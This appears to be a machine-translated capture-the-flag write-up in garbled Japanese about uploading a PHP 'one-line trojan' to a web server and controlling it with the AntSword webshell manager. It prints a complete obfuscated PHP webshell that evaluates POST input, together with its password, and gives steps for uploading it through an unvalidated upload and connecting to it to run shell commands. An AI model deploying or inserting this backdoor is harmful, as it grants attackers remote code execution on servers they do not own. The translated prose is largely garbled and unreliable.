タイトル
思考
- シェルを取得し、単語のトロイの木馬をアップロード
ツール
カーリーが来る、あなたは言葉トロイの木馬生成することができます1は、weevely、
2、中国のアリ剣https://github.com/AntSwordProject/antSword
Windowsのグラフィカルソフトウェアを、中国の包丁のアップグレードバージョンをダウンロードしてインストールするのは簡単です
ソリューション
1、単語トロイの木馬名を行うには中国の蟻プラグインで剣を持ちます 生成shell
インストールの発生後2、
3、非常に高いです
<?php // 使用时请删除此行, 连接密码: amNtMUqc ?>
<?php $hgey=create_function(chr(31536/876).chr(0646-0463).chr(01531-01352).base64_decode('bQ==').str_rot13('r'),chr(0175666/01176).chr(738-620).base64_decode('YQ==').base64_decode('bA==').chr(01641-01571).chr(20196/561).chr(0407-0224).str_rot13('b').chr(98100/900).chr(0x220-0x1bb).base64_decode('KQ==').base64_decode('Ow=='));$hgey(base64_decode('OTIzO'.'DU1O0'.'BldkF'.'sKCRf'.''.chr(909-824).chr(0163375/01531).chr(0x15a-0x121).str_rot13('G').base64_decode('Vg==').''.''.str_rot13('S').str_rot13('g').chr(231-127).str_rot13('o').base64_decode('VQ==').''.'50TVV'.'xY10p'.'OzI3N'.'zE1Nj'.'U7'.''));?>
4、何の検証が非常に単純ではありません、テキストに直接サフィックスの変更を保存し.php、それをアップロードし、
5、アドレスでの塗りつぶしは、パスワードを入力してください
6、そしてそこにそれを見つけるために、カタログを表示し、親ディレクトリをシェルを実行することができるようになります
